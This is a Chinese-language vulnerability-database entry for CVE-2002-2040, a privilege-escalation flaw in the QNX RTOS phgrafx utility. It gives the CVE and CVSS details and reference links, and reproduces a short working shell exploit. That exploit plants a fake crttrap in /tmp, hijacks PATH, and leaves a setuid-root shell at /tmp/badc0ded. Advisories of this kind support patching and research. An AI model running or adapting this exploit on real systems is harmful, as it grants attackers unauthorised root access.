QNX RTOS phgrafx特权提升漏洞

QNX RTOS phgrafx特权提升漏洞

漏洞ID 1106762 漏洞类型 访问验证错误
发布时间 2002-06-03 更新时间 2005-10-20
图片[1]-QNX RTOS phgrafx特权提升漏洞-安全小百科CVE编号 CVE-2002-2040
图片[2]-QNX RTOS phgrafx特权提升漏洞-安全小百科CNNVD-ID CNNVD-200212-857
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/21503
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-857
|漏洞详情
QNXrealtimeoperatingsystem(RTOS)4.25和6.1.0版本中(1)phrafx和(2)phgrafx-startup程序在执行系统命令之前不能正确降低特权。本地用户通过修改PATH环境变量来引用恶意crttrap程序导致执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/4915/info

The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.

#!/bin/sh
#
# click advanced,done, apply, accept and done. 
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap $1 $2 $3 $4 $5 $6 $7 $8 $9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx
|参考资料

来源:BID
名称:4916
链接:http://www.securityfocus.com/bid/4916
来源:BID
名称:4915
链接:http://www.securityfocus.com/bid/4915
来源:XF
名称:qnx-rtos-phgrafx-privileges(9257)
链接:http://www.iss.net/security_center/static/9257.php

相关推荐: CDE AIX dtterm程序缓冲区溢出漏洞

CDE AIX dtterm程序缓冲区溢出漏洞 漏洞ID 1105308 漏洞类型 缓冲区溢出 发布时间 1997-05-27 更新时间 1997-05-27 CVE编号 CVE-1999-0112 CNNVD-ID CNNVD-199705-002 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享